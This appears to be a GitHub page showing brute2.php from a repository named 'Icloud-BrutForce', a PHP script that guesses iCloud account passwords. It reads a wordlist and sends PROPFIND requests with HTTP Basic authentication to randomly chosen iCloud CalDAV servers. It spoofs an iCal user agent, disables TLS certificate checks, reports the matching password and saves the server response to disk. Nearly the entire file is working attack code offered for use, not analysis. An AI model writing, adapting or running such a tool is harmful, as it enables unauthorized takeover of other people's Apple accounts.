forked from ahmedbhl/Icloud-BrutForce
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbrute2.php
141 lines (96 loc) · 2.9 KB
/
brute2.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
<?php
$file_handle = fopen("files/wordlist.txt", "r");
$j=0;
while (!feof($file_handle)) {
$j++;
$xml="<A:propfind xmlns:A='DAV:'>
<A:prop>
<A:current-user-principal/>
</A:prop>
</A:propfind>";
$line_of_text = fgets($file_handle);
$password = rtrim($line_of_text);
//Define iCloud URLs
$icloudUrls = array();
for($i = 1; $i < 25; $i++)
$icloudUrls[] = "https://p".str_pad($i, 2, '0', STR_PAD_LEFT)."-caldav.icloud.com";
//Functions
$set = false;
$tableau = array();
foreach($icloudUrls as $server) {
$tableau[] = $server;
}
$url=$tableau[rand(1, 23)];
// function doRequest($user, $password, $url, $xml)
// {
//Init cURL
$ch=curl_init($url);
//Set headers
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Depth: 1", "Content-Type: text/xml; charset='UTF-8'", "User-Agent: DAVKit/4.0.1 (730); CalendarStore/4.0.1 (973); iCal/4.0.1 (1374); Mac OS X/10.6.2 (10C540)"));
curl_setopt($ch, CURLOPT_HEADER, 0);
//Set SSL
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
//Set HTTP Auth
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, $user.":".$password);
//Set request and XML
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PROPFIND");
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$got = 0;
$response=curl_exec($ch);
$pos = 0;
$pos = strpos($response, "OK");
if($pos > 0)
{
$got = 1;
// return $password;
echo '<font color="green"><b>Password Found!!</b><br>'.$password;
echo'<br>--------------<br>';
file_put_contents('./token.plist', $response);
echo "<center>Saved to Disk...</center>";
echo '<font color="green">Brutforce Done AT Line '.$j.'<br>';
die( "Success! The password is: {$line_of_text}" );
}
// $pos = 0;
// $pos = strpos($response, "disabled");
// if($pos > 0)
// {
// $got = 1;
// echo "password = ".$password.'<br>';
// echo "<b>Account Blocked</b><br>";
// exit(0);
// }
$pos = 0;
$pos = strpos($response, "Unauthorized");
if($pos > 0)
{
$got = 1;
echo '<font color="red">password = '.$password.'<br>';
}
if($got == 0)
{
// echo $response;
//echo "<br><br>Headers Debugging Info:<br></br>";
//echo curl_getinfo($ch, CURLINFO_HEADER_OUT);
}
if ( $error = curl_error($ch) )
echo 'ERROR: ',$error;
curl_close($ch);
if (strpos($response, "OK") !== false)
{
echo "<center>Generating Token....</center>";
file_put_contents('./password.plist', $response);
echo "<center>Saved to Disk...</center>";
die( "Success! The password is: {$line_of_text}" );
}
else
{
echo "Password Incorrect Trying Next<br>";
echo '<font color="red">Brutforce Failer AT Line '.$j.'<br>';
}
echo '=======================================================<br>';
}
fclose($file_handle);
?>